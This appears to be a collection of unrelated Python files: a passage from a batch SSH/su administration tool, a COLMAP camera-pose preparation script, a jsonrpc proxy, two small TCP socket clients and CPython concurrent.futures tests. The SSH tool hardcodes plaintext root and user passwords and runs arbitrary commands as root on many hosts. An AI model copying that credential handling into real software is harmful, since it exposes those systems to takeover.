re.sub('^\./','',PathList[0].rstrip('/')) Cmd = '%s /tmp/%s' %( re.sub('^#!','',Script_Head), os.path.basename( LocalPath )) Result = Ssh_Su_Cmd(host_ip=host_ip,Cmd=Cmd,user_name=user_name,user_pwd=user_pwd,root_name=root_name,root_pwd=root_pwd,port=port) elif Operation == 'Send_File': Result = Send_File(host_ip=host_ip,PathList=PathList,user_name=user_name,user_pwd=user_pwd,port=port) else: Result = '操作不存在' except socket.error: Result = '\033[31m主机或端口错误\033[m' except paramiko.AuthenticationException: Result = '\033[31m用户名或密码错误\033[m' except paramiko.BadHostKeyException: Result = '\033[31mBad host key\033[m[' except IOError: Result = '\033[31m远程主机已存在非空目录或没有写权限\033[m' except: Result = '\033[31m未知错误\033[m' r.put('%s\n%s\n' %(msg,Result)) def Concurrent(Conf,Operation,user_name,user_pwd,root_name,root_pwd,Cmd=None,PathList=None,port=22): # 读取配置文件 f=open(Conf) list = f.readlines() f.close() # 执行总计 total = 0 # 并发执行 for host_info in list: # 判断配置文件中注释行跳过 if host_info.startswith('#'): continue # 取变量,其中任意变量未取到就跳过执行 try: host_ip=host_info.split()[0] #user_name=host_info.split()[1] #user_pwd=host_info.split()[2] except: print('Profile error: %s' %(host_info) ) continue try: port=int(host_info.split()[3]) except: port=22 total +=1 p = multiprocessing.Process(target=Ssh,args=(host_ip,Operation,user_name,user_pwd,root_name,root_pwd,Cmd,PathList,port)) p.start() # 打印执行结果 for j in range(total): print(r.get() ) if Operation == 'Ssh_Script' or Operation == 'Ssh_Su_Script': successful = q.qsize() / 2 else: successful = q.qsize() print('\033[32m执行完毕[总执行:%s 成功:%s 失败:%s]\033[m' %(total,successful,total - successful) ) q.close() r.close() def Help(): print(''' 1.执行命令 2.执行脚本 \033[32m[位置1脚本(必须带脚本头),后可带执行脚本所需要的包\文件\文件夹路径,空格分隔]\033[m 3.发送文件 \033[32m[传送的包\文件\文件夹路径,空格分隔]\033[m 退出: 0\exit\quit 帮助: help\h\? 注意: 发送文件默认为/tmp下,如已存在同名文件会被强制覆盖,非空目录则中断操作.执行脚本先将本地脚本及包发送远程主机上,发送规则同发送文件 ''') if __name__=='__main__': # 定义root账号信息 root_name = 'root' root_pwd = 'peterli' user_name='peterli' user_pwd='xuesong' # 配置文件 Conf='serverlist.conf' if not os.path.isfile(Conf): print('\033[33m配置文件 %s 不存在\033[m' %(Conf) ) sys.exit() Help() while True: i = raw_input("\033[35m[请选择操作]: \033[m").strip() q = multiprocessing.Queue() r = multiprocessing.Queue() if i == '1': if user_name == root_name: Operation = 'Ssh_Cmd' else: Operation = 'Ssh_Su_Cmd' Cmd = raw_input('CMD: ').strip() if len(Cmd) == 0: print('\033[33m命令为空\033[m') continue Concurrent(Conf=Conf,Operation=Operation,user_name=user_name,user_pwd=user_pwd,root_name=root_name,root_pwd=root_pwd,Cmd=Cmd) elif i == '2': if user_name == root_name: Operation = 'Ssh_Script' else: Operation = 'Ssh_Su_Script' PathList = raw_input('\033[36m本地脚本路径: \033[m').strip().split() if len(PathList) == 0: print('\033[33m路径为空\033[m') continue if not os.path.isfile(PathList[0]): print('\033[33m本地路径 %s 不存在或不是文件\033[m' %(PathList[0]) ) continue for LocalPath in PathList[1:]: if not os.path.exists(LocalPath): print('\033[33m本地路径 %s 不存在\033[m' %(LocalPath) ) break else: Concurrent(Conf=Conf,Operation=Operation,user_name=user_name,user_pwd=user_pwd,root_name=root_name,root_pwd=root_pwd,PathList=PathList) elif i == '3': Operation = 'Send_File' PathList = raw_input('\033[36m本地路径: \033[m').strip().split() if len(PathList) == 0: print('\033[33m路径为空\033[m') continue for LocalPath in PathList: if not os.path.exists(LocalPath): print('\033[33m本地路径 %s 不存在\033[m' %(LocalPath) ) break else: Concurrent(Conf=Conf,Operation=Operation,user_name=user_name,user_pwd=user_pwd,root_name=root_name,root_pwd=root_pwd,PathList=PathList) elif i == '0' or i == 'exit' or i == 'quit': print("\033[34m退出LazyManage脚本\033[m") sys.exit() elif i == 'help' or i == 'h' or i == '?': Help() #END
workplace_preparation.py
import math import deepdish as dd import shutil import subprocess from os import path, makedirs, remove, listdir from argparse import ArgumentParser from threading import Thread import numpy as np from matplotlib import pyplot as plt number_of_images_in_temp_model = 10 def parse_args() -> str: """ Function to parse user argument :return: workspace_path """ ap = ArgumentParser(description='Create camera_pose files.') ap.add_argument('--workspace_path', required=True) args = vars(ap.parse_args()) return args['workspace_path'] def remove_extra_images(path_to_images: str, number_of_images: int) -> None: """ The function removes all the extra images created in the images folder :param path_to_images: path to the model images folder :param number_of_images: the number of images to reconstruct our model """ last_image = 'image' + str(number_of_images) + '.jpg' while last_image in listdir(path_to_images): last_image_path = path.join(path_to_images, last_image) remove(last_image_path) print(f"remove {last_image}") number_of_images += 1 last_image = 'image' + str(number_of_images) + '.jpg' def prepare_video(path_to_video: str, number_of_images=87) -> None: """ The function prepares the images for our model based on a given video :param path_to_video: video in h264 format :param number_of_images: the number of images to reconstruct our model (87 by default) """ temp_video = path.join(path_to_video, 'temp_outpy.mp4') video = path.join(path_to_video, 'outpy.h264') # create mp4 video for metadata and compute video duration subprocess.run(['ffmpeg', '-i', video, '-c', 'copy', temp_video]) result = subprocess.run(["ffprobe", "-v", "error", "-show_entries", "format=duration", "-of", "default=noprint_wrappers=1:nokey=1", temp_video], stdout=subprocess.PIPE, stderr=subprocess.STDOUT) video_duration = float(result.stdout) # create images folder path_to_images = path.join(path_to_video, 'images') if path.exists(path_to_images) and path.isdir(path_to_images): shutil.rmtree(path_to_images) makedirs(path_to_images) # split the given video into images subprocess.run(['ffmpeg', '-i', temp_video, '-r', str(number_of_images / video_duration), '-f', 'image2', path.join(path_to_images, 'image%d.jpg')]) # remove extra files remove_extra_images(path_to_images, number_of_images) remove(temp_video) def create_temp_model(temp_dir_path: str) -> str: """ The function prepares the images for our model based on a given video :param temp_dir_path: video in h264 format :return number_of_images: path to temporary model folder """ # create temp images folder path_to_temp_model = path.join(temp_dir_path, 'temp_model') path_to_temp_images = path.join(path_to_temp_model, 'temp_images') # remove old temporary folder if exists if path.exists(path_to_temp_model) and path.isdir(path_to_temp_model): shutil.rmtree(path_to_temp_model) number_of_temp_images = 0 path_to_images = path.join(temp_dir_path, 'images') # take only part of the images for the temp model while number_of_temp_images < number_of_images_in_temp_model: try: number_of_temp_images = len([name for name in listdir(path_to_images) if name.endswith('.jpg')]) except FileNotFoundError: number_of_temp_images = 0 # copy subdirectory example shutil.copytree(path_to_images, path_to_temp_images) # run colmap to create model for the first 10 images in video subprocess.run(['colmap', 'automatic_reconstructor', '--workspace_path', path_to_temp_model, '--image_path', path_to_temp_images, '--data_type=video', '--quality=extreme']) return path_to_temp_model def quaternion_to_rotation_matrix(q0, q1, q2, q3) -> np: """ The function converts the quaternion vector to a rotation matrix https://automaticaddison.com/how-to-convert-a-quaternion-to-a-rotation-matrix/ :param q0: the value of qw :param q1: the value of qx :param q2: the value of qy :param q3: the value of qz :return rot_matrix: rotation matrix 3x3 as NumPy array """ # First row of the rotation matrix r00 = 2 * (q0 * q0 + q1 * q1) - 1 r01 = 2 * (q1 * q2 - q0 * q3) r02 = 2 * (q1 * q3 + q0 * q2) # Second row of the rotation matrix r10 = 2 * (q1 * q2 + q0 * q3) r11 = 2 * (q0 * q0 + q2 * q2) - 1 r12 = 2 * (q2 * q3 - q0 * q1) # Third row of the rotation matrix r20 = 2 * (q1 * q3 - q0 * q2) r21 = 2 * (q2 * q3 + q0 * q1) r22 = 2 * (q0 * q0 + q3 * q3) - 1 # 3x3 rotation matrix rot_matrix = np.array([[r00, r01, r02], [r10, r11, r12], [r20, r21, r22]]) return rot_matrix def rotation_matrix_to_quaternion(rotation_matrix: np) -> object: """ The function converts rotation matrix to quaternion vector https://learnopencv.com/rotation-matrix-to-euler-angles/ :param rotation_matrix: rotation matrix 3x3 represented by NumPy array :return quaternion vector: defined by (qx, qy, qz, qw) """ cosine_for_pitch = math.sqrt(rotation_matrix[0][0] ** 2 + rotation_matrix[1][0] ** 2) is_singular = cosine_for_pitch < 10 ** -6 if not is_singular: yaw = math.atan2(rotation_matrix[1][0], rotation_matrix[0][0]) pitch = math.atan2(-rotation_matrix[2][0], cosine_for_pitch) roll = math.atan2(rotation_matrix[2][1], rotation_matrix[2][2]) else: yaw = math.atan2(-rotation_matrix[1][2], rotation_matrix[1][1]) pitch = math.atan2(-rotation_matrix[2][0], cosine_for_pitch) roll = 0 e = (yaw, pitch, roll) return euler_to_quaternion(e) def euler_to_quaternion(euler: tuple) -> object: """ The function convert Euler angle to quaternion object :param Euler: angle represented by yaw, pitch, roll :return quaternion vector: defined by (qx, qy, qz, qw) """ (yaw, pitch, roll) = (euler[0], euler[1], euler[2]) qy = np.sin(roll / 2) * np.cos(pitch / 2) * np.cos(yaw / 2) - np.cos(roll / 2) * np.sin(pitch / 2) * np.sin(yaw / 2) qx = np.cos(roll / 2) * np.sin(pitch / 2) * np.cos(yaw / 2) + np.sin(roll / 2) * np.cos(pitch / 2) * np.sin(yaw / 2) qw = np.cos(roll / 2) * np.cos(pitch / 2) * np.sin(yaw / 2) - np.sin(roll / 2) * np.sin(pitch / 2) * np.cos(yaw / 2) qz = np.cos(roll / 2) * np.cos(pitch / 2) * np.cos(yaw / 2) + np.sin(roll / 2) * np.sin(pitch / 2) * np.sin(yaw / 2) return qx, qy, qz, qw def get_first_image_pose(image_src: str) -> list: """ The function return the absolut R & T for the first image in temp model :param image_src: path to image file (colmap output) :return R&T: R = list[0], T list[1] or None if image1 not exists """ # read images file with open(image_src, 'r') as file: lines = file.readlines()[4::2] # create absolut camera pose dictionary for line in lines: columns = line.split() image_name = columns[9].split('.')[0] image_id = int(image_name.split('e')[1]) # convert and return the camera pose for the first image in model if image_id == 1: qw = float(columns[1]) qx = float(columns[2]) qy = float(columns[4]) qz = float(columns[3]) rotation_matrix = quaternion_to_rotation_matrix(qw, qx, qy, qz) tx = float(columns[5]) ty = float(columns[7]) tz = float(columns[6]) translation_vector = np.array([tx, ty, tz]) return [rotation_matrix, translation_vector] return [] def draw_rel_camera_pose(image: int, origin: list, camera_pose: list, plot_dir_path: str) -> None: """ Debug function for plotting the relative camera poses :param image: number of current image :param origin: list of [x,y,z] of the origin :param camera_pose: list of [x1,y1,z1][x2,y2,z2] of the camera pose (three 2d vectors) :param plot_dir_path: path to plot directory """ fig = plt.figure() ax = fig.add_subplot(111, projection='3d') ax.view_init(elev=10.) ax.set_title('camera pose image: %d' % image) scale = 7 ax.set_xlim3d(-scale, scale) ax.set_ylim3d(-scale, scale) ax.set_zlim3d(-scale, scale) # replace the Y-Axis with Z-Axis ax.scatter(origin[0], origin[2], origin[1], c='black') for i in range(3): ax.plot([origin[0], camera_pose[i][0]], [origin[2], camera_pose[i][2]], [origin[1], camera_pose[i][1]]) i += 1 fig.savefig(f'{plot_dir_path}/%d.png' % image) plt.close(fig) plt.clf() def compute_absolut_camera_pose(camera_pose_rel_dict: dict, first_image_pose: list, workspace_path: str, do_plot=False) -> dict: """ The function return a dictionary with recovered R&T for each image :param camera_pose_rel_dict: dictionary of relative camera poses for each image :param first_image_pose: absolute R&T of the first image :param workspace_path: path to workspace_path :param do_plot: boolean flag for debug purpose :return: camera_pose_recover dictionary """ # create directory for reference plots ref_pose_images_path = path.join(workspace_path, 'ref_images') if do_plot: makedirs(ref_pose_images_path) # initialize parameters for computing absolut camera poses camera_pose_recover = {} rotation = first_image_pose[0] translation = first_image_pose[1] is_first = True prev_rotation = np.identity(3) prev_translation = np.zeros(3) # foreach image compute the absolut pose out of the reference pose for image in camera_pose_rel_dict.keys(): rel_rotation = camera_pose_rel_dict[image][0] rel_translation = camera_pose_rel_dict[image][1] # for the first image, take the values from the temporary model if not is_first: rotation = rel_rotation @ np.linalg.inv(prev_rotation.T) translation = rel_translation + prev_translation # compute the absolut camera pose camera_pose = rotation + translation if do_plot: draw_rel_camera_pose(image, translation, camera_pose, ref_pose_images_path) # save the values foreach image (in R & T format) camera_pose_recover[image] = [rotation, translation] prev_rotation = rotation prev_translation = translation is_first = False return camera_pose_recover def write_camera_pose_to_file(camera_pose_abs_dict: dict, pose_dir_path: str) -> None: """ The function write the recovered camera poses according to COLMAP documentation :param camera_pose_abs_dict: A dictionary of recovered camera poses for each image :param pose_dir_path: path to image file """ image_dst = path.join(pose_dir_path, 'images.txt') with open(image_dst, 'w+') as file: file.write('# Image list with two lines of data per image:\n') file.write('# IMAGE_ID, QW, QX, QY, QZ, TX, TY, TZ, CAMERA_ID, NAME\n') file.write('# POINTS2D[] as (X, Y, POINT3D_ID)\n') file.write(f'# Number of images: {len(camera_pose_abs_dict.keys())}\n') # write each camera pose to file for image in camera_pose_abs_dict.keys(): image_pose_data = [] t_vector = camera_pose_abs_dict[image][1] qx, qy, qz, qw = rotation_matrix_to_quaternion(camera_pose_abs_dict[image][0]) image_pose_data.append(str(image)) # image_pose_data.append(f'{qw} {qx} {qy} {qz}') image_pose_data.append(f'{qz} {qy} {qx} {qw}') image_pose_data.append(' '.join(map(str, t_vector))) image_pose_data.append('1') image_pose_data.append(f'image{image}.jpg') file.write(' '.join(image_pose_data) + '\n\n') def clear_workspace(workspace_path: str) -> None: """ The function deletes all the files in the workspace folder except the input video """ # make sure the workspace in empty for filename in listdir(workspace_path): if filename.endswith('.h264'): continue path_to_node = path.join(workspace_path, filename) if path.isdir(path_to_node): shutil.rmtree(path_to_node) else: remove(path_to_node) def main(): # Parse input arguments: workspace_path = parse_args() clear_workspace(workspace_path) # prepare video and create the images for our model video_thread = Thread(target=prepare_video, args=(workspace_path, 87)) video_thread.start() # create temp folder for temp model temp_model_workspace_path = create_temp_model(workspace_path) # create camera pose parameters pose_output_path = path.join(workspace_path, 'camera_poses') makedirs(pose_output_path) # create camera input file camera_src = path.join(temp_model_workspace_path, 'sparse/0/cameras.txt') camera_dst = path.join(pose_output_path, 'cameras.txt') shutil.copyfile(camera_src, camera_dst) # create an empty points input file points_dst = path.join(pose_output_path, 'points3D.txt') open(points_dst, 'w').close() # get camera poses for first image image_src = path.join(temp_model_workspace_path, 'sparse/0/images.txt') first_image_pose = get_first_image_pose(image_src) if not first_image_pose: print("Error in temp model - cant compute the camera pose for the first image") exit(1) # reading the reference pose model from file camera_pose_rel_dict = dd.io.load('ref_camera_pose.h5') camera_pose_abs_dict = compute_absolut_camera_pose(camera_pose_rel_dict, first_image_pose, workspace_path, do_plot=False) # create the image file according to COLMAP documentation write_camera_pose_to_file(camera_pose_abs_dict, pose_output_path) # wait for the video thread before closing the process video_thread.join() if __name__ == "__main__": print('==============================================================================') print('workplace preparation') print('==============================================================================') main()
proxy.py
""" Copyright (c) 2006 Jan-Klaas Kollhof This file is part of jsonrpc. jsonrpc is free software; you can redistribute it and/or modify it under the terms of the GNU Lesser General Public License as published by the Free Software Foundation; either version 2.1 of the License, or (at your option) any later version. This software is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more details. You should have received a copy of the GNU Lesser General Public License along with this software; if not, write to the Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA """ class PeerObjectProxy(object): """creates a peer object which will send requests to the remote service when invoked.""" def __init__(self, name, conn): self._name = name self._conn = conn def notify(self, *args): self._conn.sendNotify(self._name, args) def __call__(self, *args): evt = self._conn.sendRequest(self._name, args) return evt.waitForResponse() def __getattr__(self, name): return PeerObjectProxy(self._name + "." + name, self._conn) class PeerProxy: def __init__(self, connectionHandler): self._connectionHandler = connectionHandler def __getattr__(self, name): return PeerObjectProxy(name, self._connectionHandler) import re class ServiceProxy(PeerProxy): def __init__(self, url, localService=None, messageDelimiter=""): m = re.match(r"^jsonrpc:\/\/(.*):(\d*)$", url) if m: from jsonrpc.socketserver import SocketServiceHandler import socket from threading import Thread (host, port)= m.groups() port = int(port) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) conn = SocketServiceHandler(s, localService,messageDelimiter=messageDelimiter) PeerProxy.__init__(self, conn) t=Thread(target=conn.receiveForever) t.setDaemon(True) t.start() else: from jsonrpc.http import HTTPClientConnectionHandler conn= HTTPClientConnectionHandler(url, localService,messageDelimiter=messageDelimiter) PeerProxy.__init__(self, conn)
tcp_client.py
""" tcp连接接收数据 """ # TCPclient.py import socket class TcpClient: def __init__(self): self.target_host = "116.62.44.118" # 服务器端地址 self.target_port = 3389 # 必须与服务器的端口号一致 def start(self): while True: client = socket.socket(socket.AF_INET,socket.SOCK_STREAM) client.connect((self.target_host,self.target_port)) data = input(">") if not data: break client.send(data.encode()) response = client.recv(1024) print(response) client.close() if __name__ == '__main__': obj = TcpClient() obj.start() # # # import socket # import threading # client_list = [] # def read_server(client_socket): # while True: # content = client_socket.recv(2048).decode('UTF-8') # if content is not None: # print("content:",content) # # client_socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM) # ## 绑定USR-K7 开启的IP地址和端口号 # client_socket.connect(('192.168.0.7',23)) # threading.Thread(target=read_server,args=(client_socket,)).start() # while True: # line = input('') # if line is None or line =='exit': # break # client_socket.send(line.encode("UTF-8"))
SocketClient.py
# -*- coding: utf-8 -*- """ Created on Mon Jul 9 20:41:03 2018 @author: 康文洋 kangwenyangde@163.com、陈祚松、夏萍萍、艾美珍、陈兰兰、张梦丽、易传佳 """ import socket import threading class SocketClient: #构造函数 def __init__(self,host,port,mainpanel): self.Host=host self.Port=port self.Mainpanel=mainpanel self.client=socket.socket() #self.IsConnected = False def ConnectServer(self): try: self.client.connect((self.Host,self.Port)) thread=threading.Thread(target=self.Client_handle) thread.start() return True except Exception as e: return False finally: pass def Client_handle(self): while True: try: #接受到的控制命令 data=self.client.recv(2048) if not data: pass else: #处理封包 self.Mainpanel.Receive(data) #返回结果 #连接状态为true except Exception as e: print("break") #连接状态为false break def SendMessage(self,messgae): try: self.client.send(messgae.encode('UTF-8')) #self.Receive() return True except Exception as e: return False finally: pass #def Receive(self): # try: # data=self.client.recv(1024) # self.Mainpanel.Receive(data) # return True # except Exception as e: # return False # finally: # pass def IsConnected(self): try: self.client.getpeername() return True except Exception as e: return False finally: pass def GetServerInfo(self): try: result= self.client.getpeername() return result except Exception as e: return ('127.0.0.1',000) finally: pass def CloseConnect(self): try: self.client.close() return True except Exception as e: return False finally: pass
test_concurrent_futures.py
import test.support # Skip tests if _multiprocessing wasn't built. test.support.import_module('_multiprocessing') # Skip tests if sem_open implementation is broken. test.support.import_module('multiprocessing.synchronize') # import threading after _multiprocessing to raise a more revelant error # message: "No module named _multiprocessing". _multiprocessing is not compiled # without thread support. test.support.import_module('threading') from test.script_helper import assert_python_ok import sys import threading import time import unittest from concurrent import futures from concurrent.futures._base import ( PENDING, RUNNING, CANCELLED, CANCELLED_AND_NOTIFIED, FINISHED, Future) import concurrent.futures.process def create_future(state=PENDING, exception=None, result=None): f = Future() f._state = state f._exception = exception f._result = result return f PENDING_FUTURE = create_future(state=PENDING) RUNNING_FUTURE = create_future(state=RUNNING) CANCELLED_FUTURE = create_future(state=CANCELLED) CANCELLED_AND_NOTIFIED_FUTURE = create_future(state=CANCELLED_AND_NOTIFIED) EXCEPTION_FUTURE = create_future(state=FINISHED, exception=IOError()) SUCCESSFUL_FUTURE = create_future(state=FINISHED, result=42) def mul(x, y): return x * y def sleep_and_raise(t): time.sleep(t) raise Exception('this is an exception') def sleep_and_print(t, msg): time.sleep(t) print(msg) sys.stdout.flush() class ExecutorMixin: worker_count = 5 def setUp(self): self.t1 = time.time() try: self.executor = self.executor_type(max_workers=self.worker_count) except NotImplementedError as e: self.skipTest(str(e)) self._prime_executor() def tearDown(self): self.executor.shutdown(wait=True) dt = time.time() - self.t1 if test.support.verbose: print("%.2fs" % dt, end=' ') self.assertLess(dt, 60, "synchronization issue: test lasted too long") def _prime_executor(self): # Make sure that the executor is ready to do work before running the # tests. This should reduce the probability of timeouts in the tests. futures = [self.executor.submit(time.sleep, 0.1) for _ in range(self.worker_count)] for f in futures: f.result() class ThreadPoolMixin(ExecutorMixin): executor_type = futures.ThreadPoolExecutor class ProcessPoolMixin(ExecutorMixin): executor_type = futures.ProcessPoolExecutor class ExecutorShutdownTest(unittest.TestCase): def test_run_after_shutdown(self): self.executor.shutdown() self.assertRaises(RuntimeError, self.executor.submit, pow, 2, 5) def test_interpreter_shutdown(self): # Test the atexit hook for shutdown of worker threads and processes rc, out, err = assert_python_ok('-c', """if 1: from concurrent.futures import {executor_type} from time import sleep from test.test_concurrent_futures import sleep_and_print t = {executor_type}(5) t.submit(sleep_and_print, 1.0, "apple") """.format(executor_type=self.executor_type.__name__)) # Errors in atexit hooks don't change the process exit code, check # stderr manually. self.assertFalse(err) self.assertEqual(out.strip(), b"apple") class ThreadPoolShutdownTest(ThreadPoolMixin, ExecutorShutdownTest): def _prime_executor(self): pass def test_threads_terminate(self): self.executor.submit(mul, 21, 2) self.executor.submit(mul, 6, 7) self.executor.submit(mul, 3, 14) self.assertEqual(len(self.executor._threads), 3) self.executor.shutdown() for t in self.executor._threads: t.join() def test_context_manager_shutdown(self): with futures.ThreadPoolExecutor(max_workers=5) as e: executor = e self.assertEqual(list(e.map(abs, range(-5, 5))), [5, 4, 3, 2, 1, 0, 1, 2, 3, 4]) for t in executor._threads: t.join() def test_del_shutdown(self): executor = futures.ThreadPoolExecutor(max_workers=5) executor.map(abs, range(-5, 5)) threads = executor._threads del executor for t in threads: t.join() class ProcessPoolShutdownTest(ProcessPoolMixin, ExecutorShutdownTest): def _prime_executor(self): pass def test_processes_terminate(self): self.executor.submit(mul, 21, 2) self.executor.submit(mul, 6, 7) self.executor.submit(mul, 3, 14) self.assertEqual(len(self.executor._processes), 5) processes = self.executor._processes self.executor.shutdown() for p in processes: p.join() def test_context_manager_shutdown(self): with futures.ProcessPoolExecutor(max_workers=5) as e: processes = e._processes self.assertEqual(list(e.map(abs, range(-5, 5))), [5, 4, 3, 2, 1, 0, 1, 2, 3, 4]) for p in processes: p.join() def test_del_shutdown(self): executor = futures.ProcessPoolExecutor(max_workers=5) list(executor.map(abs, range(-5, 5))) queue_management_thread = executor._queue_management_thread processes = executor._processes del executor queue_management_thread.join() for p in processes: p.join() class WaitTests(unittest.TestCase): def test_first_completed(self): future1 = self.executor.submit(mul, 21, 2) future2 = self.executor.submit(time.sleep, 1.5) done, not_done = futures.wait( [CANCELLED_FUTURE, future1, future2], return_when=futures.FIRST_COMPLETED) self.assertEqual(set([future1]), done) self.assertEqual(set([CANCELLED_FUTURE, future2]), not_done) def test_first_completed_some_already_completed(self): future1 = self.executor.submit(time.sleep, 1.5) finished, pending = futures.wait( [CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE, future1], return_when=futures.FIRST_COMPLETED) self.assertEqual( set([CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE]), finished) self.assertEqual(set([future1]), pending) def test_first_exception(self): future1 = self.executor.submit(mul, 2, 21) future2 = self.executor.submit(sleep_and_raise, 1.5) future3 = self.executor.submit(time.sleep, 3) finished, pending = futures.wait( [future1, future2, future3], return_when=futures.FIRST_EXCEPTION) self.assertEqual(set([future1, future2]), finished) self.assertEqual(set([future3]), pending) def test_first_exception_some_already_complete(self): future1 = self.executor.submit(divmod, 21, 0) future2 = self.executor.submit(time.sleep, 1.5) finished, pending = futures.wait( [SUCCESSFUL_FUTURE, CANCELLED_FUTURE, CANCELLED_AND_NOTIFIED_FUTURE, future1, future2], return_when=futures.FIRST_EXCEPTION) self.assertEqual(set([SUCCESSFUL_FUTURE, CANCELLED_AND_NOTIFIED_FUTURE, future1]), finished) self.assertEqual(set([CANCELLED_FUTURE, future2]), pending) def test_first_exception_one_already_failed(self): future1 = self.executor.submit(time.sleep, 2) finished, pending = futures.wait( [EXCEPTION_FUTURE, future1], return_when=futures.FIRST_EXCEPTION) self.assertEqual(set([EXCEPTION_FUTURE]), finished) self.assertEqual(set([future1]), pending) def test_all_completed(self): future1 = self.executor.submit(divmod, 2, 0) future2 = self.executor.submit(mul, 2, 21) finished, pending = futures.wait( [SUCCESSFUL_FUTURE, CANCELLED_AND_NOTIFIED_FUTURE, EXCEPTION_FUTURE, future1, future2], return_when=futures.ALL_COMPLETED) self.assertEqual(set([SUCCESSFUL_FUTURE, CANCELLED_AND_NOTIFIED_FUTURE, EXCEPTION_FUTURE, future1, future2]), finished) self.assertEqual(set(), pending) def test_timeout(self): future1 = self.executor.submit(mul, 6, 7) future2 = self.executor.submit(time.sleep, 3) finished, pending = futures.wait( [CANCELLED_AND_NOTIFIED_FUTURE, EXCEPTION_FUTURE, SUCCESSFUL_FUTURE, future1, future2], timeout=1.5, return_when=futures.ALL_COMPLETED) self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE, EXCEPTION_FUTURE, SUCCESSFUL_FUTURE, future1]), finished) self.assertEqual(set([future2]), pending) class ThreadPoolWaitTests(ThreadPoolMixin, WaitTests): pass class ProcessPoolWaitTests(ProcessPoolMixin, WaitTests): pass class AsCompletedTests(unittest.TestCase): # TODO(brian@sweetapp.com): Should have a test with a non-zero timeout. def test_no_timeout(self): future1 = self.executor.submit(mul, 2, 21) future2 = self.executor.submit(mul, 7, 6) completed = set(futures.as_completed( [CANCELLED_AND_NOTIFIED_FUTURE, EXCEPTION_FUTURE, SUCCESSFUL_FUTURE, future1, future2])) self.assertEqual(set( [CANCELLED_AND_NOTIFIED_FUTURE, EXCEPTION_FUTURE, SUCCESSFUL_FUTURE, future1, future2]), completed) def test_zero_timeout(self): future1 = self.executor.submit(time.sleep, 2) completed_futures = set() try: for future in futures.as_completed( [CANCELLED_AND_NOTIFIED_FUTURE, EXCEPTION_FUTURE, SUCCESSFUL_FUTURE, future1], timeout=0): completed_futures.add(future) except futures.TimeoutError: pass self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE, EXCEPTION_FUTURE, SUCCESSFUL_FUTURE]), completed_futures) class ThreadPoolAsCompletedTests(ThreadPoolMixin, AsCompletedTests): pass class ProcessPoolAsCompletedTests(ProcessPoolMixin, AsCompletedTests): pass class ExecutorTest(unittest.TestCase): # Executor.shutdown() and context manager usage is tested by # ExecutorShutdownTest. def test_submit(self): future = self.executor.submit(pow, 2, 8) self.assertEqual(256, future.result()) def test_submit_keyword(self): future = self.executor.submit(mul, 2, y=8) self.assertEqual(16, future.result()) def test_map(self): self.assertEqual( list(self.executor.map(pow, range(10), range(10))), list(map(pow, range(10), range(10)))) def test_map_exception(self): i = self.executor.map(divmod, [1, 1, 1, 1], [2, 3, 0, 5]) self.assertEqual(i.__next__(), (0, 1)) self.assertEqual(i.__next__(), (0, 1)) self.assertRaises(ZeroDivisionError, i.__next__) def test_map_timeout(self): results = [] try: for i in self.executor.map(time.sleep, [0, 0, 3], timeout=1.5): results.append(i) except futures.TimeoutError: pass else: self.fail('expected TimeoutError') self.assertEqual([None, None], results) class ThreadPoolExecutorTest(ThreadPoolMixin, ExecutorTest): pass class ProcessPoolExecutorTest(ProcessPoolMixin, ExecutorTest): pass class FutureTests(unittest.TestCase): def test_done_callback_with_result(self): callback_result = None def fn(callback_future): nonlocal callback_result callback_result = callback_future.result() f = Future() f.add_done_callback(fn) f.set_result(5) self.assertEqual(5, callback_result) def test_done_callback_with_exception(self): callback_exception = None def fn(callback_future): nonlocal callback_exception callback_exception = callback_future.exception() f = Future() f.add_done_callback(fn) f.set_exception(Exception('test')) self.assertEqual(('test',), callback_exception.args) def test_done_callback_with_cancel(self): was_cancelled = None def fn(callback_future): nonlocal was_cancelled was_cancelled = callback_future.cancelled() f = Future() f.add_done_callback(fn) self.assertTrue(f.cancel()) self.assertTrue(was_cancelled) def test_done_callback_raises(self): with test.support.captured_stderr() as stderr: raising_was_called = False fn_was_called = False def raising_fn(callback_future): nonlocal raising_was_called raising_was_called = True raise Exception('doh!') def fn(callback_future): nonlocal fn_was_called fn_was_called = True f = Future() f.add_done_callback(raising_fn) f.add_done_callback(fn) f.set_result(5) self.assertTrue(raising_was_called) self.assertTrue(fn_was_called) self.assertIn('Exception: doh!', stderr.getvalue()) def test_done_callback_already_successful(self): callback_result = None def fn(callback_future): nonlocal callback_result callback_result = callback_future.result() f = Future() f.set_result(5) f.add_done_callback(fn) self.assertEqual(5, callback_result) def test_done_callback_already_failed(self): callback_exception = None def fn(callback_future): nonlocal callback_exception callback_exception = callback_future.exception() f = Future() f.set_exception(Exception('test')) f.add_done_callback(fn) self.assertEqual(('test',), callback_exception.args) def test_done_callback_already_cancelled(self): was_cancelled = None def fn(callback_future): nonlocal was_cancelled was_cancelled = callback_future.cancelled() f = Future() self.assertTrue(f.cancel()) f.add_done_callback(fn) self.assertTrue(was_cancelled) def test_repr(self): self.assertRegex(repr(PENDING_FUTURE), '<Future at 0x[0-9a-f]+ state=pending>') self.assertRegex(repr(RUNNING_FUTURE), '<Future at 0x[0-9a-f]+ state=running>') self.assertRegex(repr(CANCELLED_FUTURE), '<Future at 0x[0-9a-f]+ state=cancelled>') self.assertRegex(repr(CANCELLED_AND_NOTIFIED_FUTURE), '<Future at 0x[0-9a-f]+ state=cancelled>') self.assertRegex( repr(EXCEPTION_FUTURE), '<Future at 0x[0-9a-f]+ state=finished raised IOError>') self.assertRegex( repr(SUCCESSFUL_FUTURE), '<Future at 0x[0-9a-f]+ state=finished returned int>') def test_cancel(self): f1 = create_future(state=PENDING) f2 = create_future(state=RUNNING) f3 = create_future(state=CANCELLED) f4 = create_future(state=CANCELLED_AND_NOTIFIED) f5 = create_future(state=FINISHED, exception=IOError()) f6 = create_future(state=FINISHED, result=5) self.assertTrue(f1.cancel()) self.assertEqual(f1._state, CANCELLED) self.assertFalse(f2.cancel()) 